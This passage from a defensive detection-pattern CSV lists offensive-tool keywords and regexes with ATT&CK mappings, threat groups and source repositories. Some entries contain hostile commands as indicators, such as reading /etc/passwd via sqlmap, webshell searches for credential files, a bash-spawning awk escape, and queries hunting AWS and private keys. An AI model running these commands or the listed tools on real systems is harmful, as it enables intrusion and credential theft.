etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","44898" "*FileControler/FileControler_x86.dll*",".{0,1000}FileControler\/FileControler_x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","44899" "*File-Extensions-Wordlist.txt*",".{0,1000}File\-Extensions\-Wordlist\.txt.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation 
tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","44900" "*Fileless Lateral Movement.csproj*",".{0,1000}Fileless\sLateral\sMovement\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","44901" "*fileless-elf-exec*",".{0,1000}fileless\-elf\-exec.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44902" "*FilelessPELoader.cpp*",".{0,1000}FilelessPELoader\.cpp.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","44903" "*FilelessPELoader.exe*",".{0,1000}FilelessPELoader\.exe.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","44904" 
"*FilelessPELoader.sln*",".{0,1000}FilelessPELoader\.sln.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","44905" "*FilelessPELoader.vcxproj*",".{0,1000}FilelessPELoader\.vcxproj.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","44906" "*FilelessPELoader-main*",".{0,1000}FilelessPELoader\-main.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","44907" "*FilelessShellcode.cpp*",".{0,1000}FilelessShellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","44908" "*FilelessShellcode.exe*",".{0,1000}FilelessShellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - 
T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","44909" "*FilelessShellcode.sln*",".{0,1000}FilelessShellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","44910" "*FilelessShellcode.vcxproj*",".{0,1000}FilelessShellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","44911" "*FileMonitor has injected FileMonitorHook into process *",".{0,1000}FileMonitor\shas\sinjected\sFileMonitorHook\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","44912" "*filemsf.py*",".{0,1000}filemsf\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet 
penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","44913" "*filename = ""keycap.log""*",".{0,1000}filename\s\=\s\""keycap\.log\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","44914" "*--file-read=/etc/passwd*",".{0,1000}\-\-file\-read\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","44915" "*Files has been encrypted with hidden tear*",".{0,1000}Files\shas\sbeen\sencrypted\swith\shidden\stear.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","44916" "*files/BindShell.exe*",".{0,1000}files\/BindShell\.exe.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","44917" "*files/BindShell.exe*",".{0,1000}files\/BindShell\.exe.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","44918" "*files/team-edward.py*",".{0,1000}files\/team\-edward\.py.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","44919" "*filetype:credentials* AND ((client_id OR clientID) AND (tenant) AND (secret))*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(\(client_id\sOR\sclientID\)\sAND\s\(tenant\)\sAND\s\(secret\)\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","44921" "*filetype:credentials* AND (\""AWS_ACCESS_KEY_ID\"" OR \""AWS_SECRET_ACCESS_KEY\""*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(\\\""AWS_ACCESS_KEY_ID\\\""\sOR\s\\\""AWS_SECRET_ACCESS_KEY\\\"".{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset 
for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","44922" "*filetype:credentials* AND (begin NEAR(n=1) (RSA OR OPENSSH OR DSA OR EC OR PGP) NEAR(n=1) KEY)*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(begin\sNEAR\(n\=1\)\s\(RSA\sOR\sOPENSSH\sOR\sDSA\sOR\sEC\sOR\sPGP\)\sNEAR\(n\=1\)\sKEY\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","44923" "*filetype:pem*AND (\""BEGIN RSA PRIVATE KEY\"" OR \""BEGIN DSA PRIVATE KEY\"" OR \""BEGIN EC PRIVATE KEY\*",".{0,1000}filetype\:pem.{0,1000}AND\s\(\\\""BEGIN\sRSA\sPRIVATE\sKEY\\\""\sOR\s\\\""BEGIN\sDSA\sPRIVATE\sKEY\\\""\sOR\s\\\""BEGIN\sEC\sPRIVATE\sKEY\\.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","44924" "*filezilla_stealer*",".{0,1000}filezilla_stealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","44925" "*filezilla2john.py*",".{0,1000}filezilla2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","44926" "*--filter=add-filters-defender-crowdstrike.json*",".{0,1000}\-\-filter\=add\-filters\-defender\-crowdstrike\.json.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permitting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","44933" "*fin3ss3g0d/ASPJinjaObfuscator*",".{0,1000}fin3ss3g0d\/ASPJinjaObfuscator.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","44934" "*fin3ss3g0d/secretsdump*",".{0,1000}fin3ss3g0d\/secretsdump.{0,1000}","offensive_tool_keyword","secretsdump","secretsdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fin3ss3g0d/secretsdump.py","1","0","N/A","N/A","10","3","216","25","2023-07-31T20:08:46Z","2023-07-25T16:29:32Z","44935" "*finalrecon.py 
--*",".{0,1000}finalrecon\.py\s\-\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44936" "*find . -name spring-beans*.jar*",".{0,1000}find\s\.\s\-name\sspring\-beans.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","0","#linux","N/A","N/A","4","366","108","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z","44939" "*find . -perm -2 -ls*",".{0,1000}find\s\.\s\-perm\s\-2\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44941" "*find . -type f -name .bash_history*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44943" "*find . 
-type f -name .bash_history*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44944" "*find . -type f -name .fetchmailrc*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44946" "*find . -type f -name .fetchmailrc*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44947" "*find . -type f -name .htpasswd*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44949" "*find . 
-type f -name .htpasswd*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44950" "*find . -type f -name service.pwd*",".{0,1000}find\s\.\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44952" "*find . -type f -name service.pwd*",".{0,1000}find\s\.\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44953" "*find . -type f -perm -02000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44955" "*find . 
-type f -perm -02000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44956" "*find . -type f -perm -04000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44958" "*find . -type f -perm -04000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44959" "*find / * -4000 -type f -print*",".{0,1000}find\s\/\s.{0,1000}\s\-4000\s\-type\sf\s\-print.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","44960" "*find / * -perm -2000 -type f -print*",".{0,1000}find\s\/\s.{0,1000}\s\-perm\s\-2000\s\-type\sf\s\-print.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - 
T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","44961" "*find / * -regextype egrep -iregex*\.kdbx*",".{0,1000}find\s\/\s.{0,1000}\s\-regextype\segrep\s\-iregex.{0,1000}\\\.kdbx.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","44962" "*find / -exec /usr/bin/awk 'BEGIN {system(\""/bin/bash\""*",".{0,1000}find\s\/\s\-exec\s\/usr\/bin\/awk\s\'BEGIN\s\{system\(\\\""\/bin\/bash\\\"".{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. 
clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","44963" "*find / -perm -2 -ls*",".{0,1000}find\s\/\s\-perm\s\-2\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44976" "*find / -type f -name .bash_history*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44988" "*find / -type f -name .bash_history*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44989" "*find / -type f -name .fetchmailrc*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - 
